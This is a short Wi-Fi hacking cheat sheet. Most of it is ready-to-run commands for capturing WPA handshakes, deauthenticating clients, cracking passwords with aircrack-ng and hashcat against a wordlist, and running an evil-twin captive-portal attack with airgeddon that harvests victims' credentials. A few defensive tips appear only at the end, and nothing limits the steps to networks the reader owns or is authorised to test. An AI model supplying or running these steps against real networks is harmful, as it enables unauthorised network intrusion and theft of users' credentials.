📡 Complete Wi‑Fi Hacking Handbook
🛠️ Prerequisites
- Wireless adapter that supports monitor mode and packet injection (e.g., Alfa AWUS036ACH)
- Kali Linux or similar
- Tools: aircrack‑ng, aireplay‑ng, airodump‑ng, airmon‑ng, hashcat, wifite, airgeddon
1. Capture 4‑Way Handshake
# Put card in monitor mode sudo airmon-ng start wlan0 # Scan for networks sudo airodump-ng wlan0mon # Capture handshake (replace channel, BSSID, interface) sudo airodump-ng -c 11 --bssid EA:75:F8:98 -w hack1 wlan0mon # Deauthenticate client to force reconnection (second terminal) sudo aireplay-ng -0 5 -a EA:75:F8:98 wlan0mon
Wireshark filter: eapol to see the 4 messages.
2. Cracking the Password
Aircrack‑ng
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
Wifite + Hashcat
# Use wifite to capture handshake sudo wifite # Convert cap to hccapx cap2hccapx hack1-01.cap hack1.hccapx # Crack with hashcat hashcat -m 2500 hack1.hccapx /usr/share/wordlists/rockyou.txt
hcxdumptool + hashcat (modern)
sudo systemctl stop NetworkManager sudo hcxdumptool -i wlan0 -o dumpfile.pcapng hcxpcapngtool -o hash.hc22000 dumpfile.pcapng hashcat -m 22000 hash.hc22000 rockyou.txt
3. Evil‑Twin Attack with Airgeddon
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git cd airgeddon sudo bash airgeddon.sh
- Select interface → put in monitor mode
- Choose “Evil Twin attacks” → “Create an Evil Twin”
- Select target AP, choose channel, start captive portal
- Victim connects → credentials captured
4. Packet Injection Test
# Test injection on specific AP sudo aireplay-ng -9 -a EA:75:F8:98 wlan0mon
🛡️ Mitigation / Defense
- Use WPA3 (if supported) or strong WPA2 passphrase (>12 chars, complex)
- Disable WPS
- Enable 802.11w (Management Frame Protection)
- Regularly update router firmware
- Monitor for rogue APs